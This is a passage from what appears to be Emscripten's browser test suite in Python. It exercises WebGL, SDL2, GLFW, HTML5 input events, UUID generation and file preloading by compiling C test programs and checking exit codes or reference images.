return preloadedWasm['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
args=['-sMAIN_MODULE=2', '--preload-file', '.@/', '-O2', '--use-preload-plugins'] + args)
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest_exit('hello_world_gles.c', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid/test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = read_file('test.js')
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(test_file('uuid/test.js'))
try_delete(test_file('uuid/test.js.map'))
# Now run test in browser
self.btest_exit(test_file('uuid/test.c'), args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-sLEGACY_GL_EMULATION'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-sLEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure=1', '-sHTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],),
'legacy': (['-sMIN_FIREFOX_VERSION=0', '-sMIN_SAFARI_VERSION=0', '-sMIN_IE_VERSION=0', '-sMIN_EDGE_VERSION=0', '-sMIN_CHROME_VERSION=0', '-Wno-transpile'],)
})
@requires_threads
def test_html5_core(self, opts):
if '-sHTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0' in opts:
# In this mode an exception can be thrown by the browser, and we don't
# want the test to fail in that case so we override the error handling.
create_file('pre.js', '''
window.disableErrorReporting = true;
window.addEventListener('error', (event) => {
if (!event.message.includes('exception:fullscreen error')) {
report_error(event);
}
});
''')
self.emcc_args.append('--pre-js=pre.js')
self.btest(test_file('test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
print(opts)
self.btest_exit(test_file('test_gamepad.c'), args=[] + opts)
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sFULL_ES2=1'], ['-sUSE_PTHREADS']]:
print(opts)
self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-lGL'])
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest_exit(test_file('webgl_create_context2.cpp'))
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -sDISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(test_file('browser/html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL'])
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest_exit(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL'])
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
@requires_graphics_hardware
def test_webgl_shader_source_length(self):
for opts in [[], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL'])
# Tests calling glGetString(GL_UNMASKED_VENDOR_WEBGL).
@requires_graphics_hardware
def test_webgl_unmasked_vendor_webgl(self):
self.btest_exit(test_file('webgl_unmasked_vendor_webgl.c'), args=['-lGL'])
@requires_graphics_hardware
def test_webgl2(self):
for opts in [
['-sMIN_CHROME_VERSION=0', '-Wno-transpile'],
['-O2', '-g1', '--closure=1', '-sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-sFULL_ES2=1'],
]:
print(opts)
self.btest_exit(test_file('webgl2.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'] + opts)
# Tests the WebGL 2 glGetBufferSubData() functionality.
@requires_graphics_hardware
def test_webgl2_get_buffer_sub_data(self):
self.btest_exit(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest_exit(test_file('webgl2.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL', '-sUSE_PTHREADS'])
@requires_graphics_hardware
def test_webgl2_objects(self):
self.btest_exit(test_file('webgl2_objects.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
def test_html5_webgl_api(self):
for mode in [['-sOFFSCREENCANVAS_SUPPORT', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],
['-sOFFSCREEN_FRAMEBUFFER', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest_exit(test_file('html5_webgl.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'] + mode)
@requires_graphics_hardware
def test_webgl2_ubos(self):
self.btest_exit(test_file('webgl2_ubos.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'])
self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'))
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest_exit(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-sWEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'])
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
# but context creation fails, that we can then manually try to create a
# WebGL1 context and succeed.
self.btest_exit(test_file('test_webgl2_runtime_no_context.cpp'), args=['-sMAX_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest_exit(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-sMAX_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest_exit(test_file('webgl_with_closure.cpp'), args=['-O2', '-sMAX_WEBGL_VERSION=2', '--closure=1', '-lGL'])
# Tests that -sGL_ASSERTIONS and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest_exit(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-sMAX_WEBGL_VERSION=2', '-sGL_ASSERTIONS'])
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest_exit(test_file('webgl2_pbo.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(test_file('third_party/sokol/mipmap-emsc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=Path('third_party/sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(test_file('third_party/sokol/mrt-emcc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'],
reference=Path('third_party/sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(test_file('third_party/sokol/arraytex-emsc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'],
reference=Path('third_party/sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest_exit(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'])
def test_wget(self):
create_file('test.txt', 'emscripten')
self.btest_exit(test_file('test_wget.c'), args=['-sASYNCIFY'])
def test_wget_data(self):
create_file('test.txt', 'emscripten')
self.btest_exit(test_file('test_wget_data.c'), args=['-O2', '-g2', '-sASYNCIFY'])
@parameterized({
'': ([],),
'es6': (['-sEXPORT_ES6=1'],),
})
def test_locate_file(self, args):
self.set_setting('EXIT_RUNTIME')
for wasm in [0, 1]:
self.clear()
create_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''')
create_file('data.txt', 'load me right before...')
create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-sFORCE_FILESYSTEM', '-sWASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', Path('sub/page.wasm'))
else:
shutil.move('page.html.mem', Path('sub/page.html.mem'))
shutil.move('test.data', Path('sub/test.data'))
self.run_browser('page.html', None, '/report_result?exit:0')
# alternatively, put locateFile in the HTML
print('in html')
create_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-sSAFE_HEAP', '-sASSERTIONS', '-sFORCE_FILESYSTEM', '-sWASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
if wasm:
shutil.move('page.wasm', Path('sub/page.wasm'))
else:
shutil.move('page.html.mem', Path('sub/page.html.mem'))
self.run_browser('page.html', None, '/report_result?exit:' + expected)
in_html('0')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
return result;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-sLEGACY_GL_EMULATION'], ['-Os', '--closure=1']]:
print(opts)
self.btest(test_file('glfw3.c'), args=['-sUSE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(test_file('glfw_events.c'), args=['-sUSE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(test_file('glfw_events.c'), args=['-sUSE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-sSDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-sSDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-sUSE_SDL=2', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one'])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-sUSE_PTHREADS', '-sUSE_SDL=2', '-sPROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-sUSE_SDL=2', '-O2', '--closure=1', '-g1', '-sLEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-sUSE_SDL=2', '-O2', '-sLEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-sUSE_SDL=2', '-sUSE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-sUSE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-sUSE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-sUSE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-sUSE_SDL=2', '-sINITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
create_file('test.html', html)
create_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-sUSE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-sGL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-sUSE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-sUSE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-sUSE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_glclipplane_gllighting(self):
self.btest('sdl2_glclipplane_gllighting.c', reference='sdl2_glclipplane_gllighting.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='glClipPlane and GL_LIGHTING emulation. You should see a torus cut open on one side with lighting from one lightsource applied.')
@requires_graphics_hardware
def test_sdl2_glalphatest(self):
self.btest('sdl2_glalphatest.c', reference='sdl2_glalphatest.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='GL_ALPHA_TEST emulation. You should see gradients with different alpha testing modes and reference values.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-sUSE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = read_file('test.html')
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-sGL_TESTING', '-sUSE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(test_file('freetype/LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-sUSE_SDL=2', '-sUSE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(test_file('third_party/notofont/NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
